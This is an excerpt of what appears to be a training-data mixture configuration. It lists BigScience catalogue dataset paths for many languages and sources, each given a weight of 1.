"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-wo_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_wikiversity_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zht_qedcorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_qedcorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-as_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-lg_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_502_www_ricemedia_co": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zhs_qedcorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-fon_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_recibrew": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_wikivoyage_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-sn_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-kn_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_arabench": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_qedcorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_30_www_radiocable_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_wikivoyage_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_wikinews_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_qedcorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-zu_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_wikivoyage_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-as_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_pseudocrawl-filtered_674_ai_baidu_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_ester": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_wikiversity_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-pa_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-ig_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_qedcorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_wikinews_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_wikivoyage_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_492_www_vivawoman_net": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_pib": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_pib": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_wikinews_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-gu_pib": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_wikiversity_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_bengali_question_answering": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_244_www_df_cl": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_scielo": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_485_blog_moneysmart_sg": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_488_dailyvanity_sg": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_696_www_oercommons_org": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_wikinews_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_483_alvinology_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indo4b_kompas": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_qedcorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-xh_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-or_odiencorp": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_habibi": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_wikiversity_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_zh_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_pib": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-pa_pib": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_wikiquote_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_pseudocrawl-filtered_672_pt_globalvoices_org": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_labr": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_339_www_actasanitaria_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_pib": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_wikinews_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-or_pib": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-bn_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_wikinews_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_wikivoyage_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ur_pib": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_wikivoyage_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_pseudocrawl-filtered_563_ahotsak_eus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indo4b_tempo": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_32_www_elexpresso_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indosum": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ml_open_subtitles": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_91_www_diario26_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-rw_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_ted_talks_iwslt": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_opus100": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_500_www_asiaone_com_singapore": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_pseudocrawl-filtered_530_www_mediapart_fr": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-ta_pib": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_470_forums_hardwarezone_com_sg": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_223_www_eltambor_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_indo4b_jw300": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_219_www_aguasresiduales_info": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_376_www_elpopular_com_ar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_62_www_lapagina_com_sv": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-or_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_data_on_covid_19_news_coverage_in_vietnam": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_548_remezcla_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_499_www_today_com_news": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_wikinews_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_vntq_corpus_big": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_pseudocrawl-filtered_545_www_detik_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-or_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-or_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_pseudocrawl-filtered_637_www_argia_eus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_501_theindependent_sg": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_430_www_eldiario_ec": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_420_www_retema_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-as_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ar_kalimat": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_487_thesmartlocal_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_ca_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_153_financialfood_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_wikinews_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-gu_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_158_www_diariodeleon_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_pseudocrawl-filtered_599_fr_globalvoices_org": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_392_www_muypymes_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_pseudocrawl-filtered_506_goiena_eus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_wikibooks_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-hi_pib": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_231_ojo_pe": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_167_www_ambientum_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_id_wiktionary_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_vi_vietnamese_poetry": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_118_www_elheraldo_hn": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_233_www_dinero_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_eu_pseudocrawl-filtered_635_www_berria_eus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_pseudocrawl-filtered_395_www_evwind_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_182_correodelsur_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_fr_wikiversity_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_56_www_eluniverso_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_pt_project_gutenberg": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_250_www_cooperativa_cl": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_374_www_talcualdigital_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_nigercongo-yo_aggregated": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_315_lasillavacia_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_207_elimpulso_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_276_radio_uchile_cl": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_325_www_laprensa_hn": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_294_www_laopinion_com_co": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-gu_wikipedia": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_34_www_losandes_com_ar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_90_peru_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_23_www_elconfidencialdigital_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_125_www_noticiasde_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_359_www_efeverde_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-mr_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-pa_wikisource_filtered": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_en_qedcorpus": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_381_www_cuartopoder_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_518_www_elcolombiano_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_280_salamancartvaldia_es": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_341_es_cointelegraph_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-or_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_165_www_ticbeat_com": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_indic-te_samanantar": 1.,
"/gpfsscratch/rech/six/commun/bigscience-datasets/catalogue/clean_v2/bigscience-catalogue-lm-data/lm_es_pseudocrawl-filtered_641_es_globalvoices_org": 1.,
